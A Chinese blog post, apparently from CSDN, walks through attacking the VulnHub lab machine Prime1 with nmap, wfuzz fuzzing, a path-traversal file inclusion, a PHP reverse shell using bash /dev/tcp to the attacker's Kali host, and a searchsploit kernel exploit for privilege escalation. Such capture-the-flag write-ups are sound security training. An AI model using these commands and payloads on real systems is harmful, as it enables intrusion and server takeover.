打靶:vulnhub中的Prime1

已于 2024-04-18 11:04:10 修改
阅读量1.4k 收藏 34
点赞数 51
文章标签: linux 运维 服务器
于 2024-04-18 10:14:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73865998/article/details/137654593
版权

靶机下载链接:https://download.vulnhub.com/prime/Prime_Series_Level-1.rar

复现视频:【「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼,试试吧,按图索骥!】https://www.bilibili.com/video/BV1yP41177h7?vd_source=09d322662ec63869ded6328cd2203029

 

目录

信息收集

 web渗透

​编辑 文件包含漏洞

内核漏洞提权

信息收集

主机发现:sudo nmap -sn c段

扫描端口:sudo nmap --min-rate 10000 -p- 靶机ip

端口服务及操作系统:sudo nmap -sT -sV -O -p端口 靶机ip

udp扫描:sudo nmap -sU -p端口 靶机ip

默认脚本扫描:sudo nmap --script=vuln -p端口 靶机ip

通过扫描之后,发现22,80端口在开放,默认脚本扫描没有发现漏洞。

可以访问80端口看一下 ,是一张kali图片。

多去用curl去查看网址链接,一是帅,二是快,哈哈。然而并没有发现什么消息。

 web渗透

目录爆破

扫出来很多目录,依次去访问,查看目录内容。

“你好
现在您处于0级阶段。
在现实生活中,我们应该非常努力地使用我们的工具在网上挖掘。
快乐的黑客。 ”

 发现wordpress内容管理系统

还有后台

并没有什么过多内容,在指定一下后缀名,扫描一下。

两个php页面,是最开始的kali图片。去访问一下发现的文件

“看起来你有一些秘密。
好的,我只是想帮你。
在你发现的php的每一页上做更多的模糊处理。如果
如果得到任何正确的参数,请按照以下步骤操作。如果你仍然坚持
从这里学习一个很好地使用OSCP的基本工具。
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
 
//查看location.txt,您将获得下一步行动//”

直接访问location.txt,是没有内容的。

 根据提示是让我们进行模糊测试

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://靶机ip/index.php?FUZZ=

-c进行高亮显示;

-w选择字典;

-hh进行筛选;

对另一个php页面进行模糊测试,并没有发现payload

 利用payload

“做得更好<br><br><br><br><br>好吧现在你知道了确切的参数<br><br>现在为下一个挖掘更多<br>在其他php页面上使用“secrettier360”参数以获得更多乐趣。”

“最终,您得到了正确的参数<br><br><br><br></html>”,没看到有什么参数。

 文件包含漏洞

提示说找到了正确的参数,但是直接访问是没有任何东西的,那就试试有没有文件包含的漏洞。 

http://靶机ip/image.php?secrettier360=../../../../../../../../../../../etc/passwd

还真的具有文件包含漏洞,重点看具有完整shell的用户

 “在我的目录中查找password.txt文件”,可能是一个密码文件,尝试去访问

内容:“你得到了正确的参数”。

后面的可能是密码。

 利用具有完整shell的用户去登陆wordpress的后台

成功登陆。

 接下来就是常规思路,写反弹shell命令,nc监听。去找后缀名为.php的后台路径,写入反弹shell命令。

<?php

exec("/bin/bash -c 'bash -i>& /dev/tcp/kali的ip/监听端口 0>&1' ");

?>

打开nc监听端口

去找触发的路径,在首页的位置给了以下提示

构造路径,我实在想不出来,就直接套用了红笔老师的路径

http://靶机ip/wordpress/wp-content/themes/twentynineteen/secret.php

成功拿到shell,查看当前的用户,以及权限,发现具有一点root权限。

内核漏洞提权

查看定时任务,并没有能够提权的文件

查看系统内核,发现是个较为老旧的版本,试试能不能提权

利用searchsploit查找有没有可以利用的内核漏洞模块,第一个模块是释放后重用漏洞,第二个和第三个都跟提权有关。

searchsploit Linux ubuntu 4.10.0-28

将第二个模块下载一下。

searchsploit -m 45010.c 

 在kali中重新开启一个端口,将下载的45010.c文件,传输到靶机中

python -m http.server 4222

注意是在tmp文件目录下。访问kali端口,下载45010.c文件。

“文章中端口写错了,在kali中是改了一次端口”

在靶机中编译文件

给文件执行权限

chmod +x nihao

执行文件

./nihao

我这里不知道为啥靶机内核版本变高了,提权没提上去。

 如果内核版本号是4.15.0-142,内核提权是失败的。版本号是4.10.0-28,是可以内核提权的。

Hero197
关注
  • 51
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
HTB打靶日记:Investigation
01-27
hackthebox
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
红队笔记6-Prime1打靶流程-提权-OpenSSL解密(vulnhub
qq_63442530的博客
03-19 1136
本篇文章是根据靶场作者给出的提权通过openssl解密获得saket用户密码,在saket用户sudo -l提权成功,没有使用内核提权,也是作者想让我们学习openssl解密:1.enc运行密码的查找:find 找备份文件->缺少密码时可以通过查找备份文件可能存有密码2.密钥的处理:我们获得密钥,对其进行md5加密(md5sum)和16进制转换(od)3.openssl解密参数构造:查看openssl帮助文档,确定参数。
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
vulnhub 靶场prime1打靶记录
weixin_54603520的博客
05-09 275
vulnhub 】---prime 靶场打靶记录
Vulnhub靶机:PRIME_ 1
LainWith的博客
12-10 601
Prime(此系列共1台)发布日期:2019年9月1日难度:初-运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描目录爆破文件扩展名爆破强制访问文件包含漏洞WordPress利用内核提权。
红队打靶Prime1详细打靶思路之模糊测试+内核提权(vulnhub
Bossfrank的博客
06-11 1408
本篇博客详述了vulnhub靶机prime1打靶思路过程,并非简单复现writeup。打靶过程涉及到关于模糊测试及wfuzz工具的使用、文件包含漏洞利用、wordpress CMS、内核漏洞提权。有关OpenSSH渗透的方法将在下一篇博客详述。
[渗透测试学习靶机07] vulnhub靶场 Prime 2
weixin_47112073的博客
10-27 1560
Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。
红队笔记5-Prime1打靶流程-模糊测试+内核提权(vulnhub
qq_63442530的博客
03-18 924
学习的视频是哔哩哔哩红队笔记:「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼,试试吧,按图索骥!_哔哩哔哩_bilibili打靶时参考文章和本文借鉴文章:红队打靶Prime1详细打靶思路之模糊测试+内核提权(vulnhub)_prime1靶机-CSDN博客靶机下载链接见:https://download.vulnhub.com/sickos/sick0s1.1.7zSudo nmap -sn 192.168.254.0/24目标主机ip:192.254.168.1441.快速扫描发现存活
Linux fallocate工具用于预分配或释放文件空间的块
不积跬步,无以至千里;不积小流,无以成江海。
06-09 311
命令,您需要在具有适当权限的环境运行它,例如通过SSH登录到Linux服务器或在Linux终端运行。请确保指定的路径存在且可写。文件未使用的磁盘空间。请注意,这不会改变文件的大小,只是释放了未使用的磁盘空间。之前,建议了解文件系统和存储设备的特性,以避免潜在的性能问题。是一个Linux命令行工具,用于预分配或释放文件空间的块。文件的大小截断为5MB。大于5MB的部分将被删除。文件的10MB偏移量处开始预分配5MB的磁盘空间。文件的10MB偏移量处开始的5MB磁盘空间。文件预分配10MB的磁盘空间。
解决 Linux 和 Java 1.8 上传文名称图片报错问题
appearappear的博客
06-12 263
Linux 系统和 Java 1.8 ,当尝试上传含有文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有文名称的文件,避免了报错问题的发生。3.5
linux: IDEA 由于JVM 设置内存过小,导致打开项目闪退问题
最新发布
m0_72560900的博客
06-12 388
linux(debian/ubuntu)idea的插件默认安装位置和配置文件在哪里?
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 332
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库
Linux基础命令
威桑的博客
06-11 948
常见基础Linux命令
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 761
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
MySQl基础----Linux下搭建mysql软件及登录和基本使用(附实操图超简单一看就会)
溟洵的博客
06-10 775
本章非常基础包括如何在Linux上搭建(==当然上面的SQL语句你在其他能执行SQL语句的软件上也能正常执行,并非一定要在Linux环境下==)和mysql的基本使用
最优控制打靶法与配点法的优劣
05-24
打靶法和配点法都是最优控制常用的优化方法,它们各有优缺点。 打靶法(也称“直接法”)是一种直接求解最优控制问题的方法,通过在时域内对状态和控制量进行离散化,将最优控制问题转化为一个非线性规划问题求解。优点是算法简单、容易实现,对于非线性、多约束的问题有较好的适用性。缺点是随着离散化步长的减小,计算量呈指数级增长,计算复杂度较高。 配点法(也称“间接法”)是一种基于正则化理论的优化方法,通过构造系统的Hamilton-Jacobi-Bellman方程,将最优控制问题转化为一个偏微分方程的求解问题。优点是可以得到解的解析表达式,对于线性、时间不变的系统具有很好的适用性。缺点是需要求解偏微分方程,求解过程较为复杂,对于非线性、多约束的问题适用性较差。 综上所述,打靶法和配点法各有其适用性和局限性,在实际应用需要根据具体问题的特点和求解要求选择合适的方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值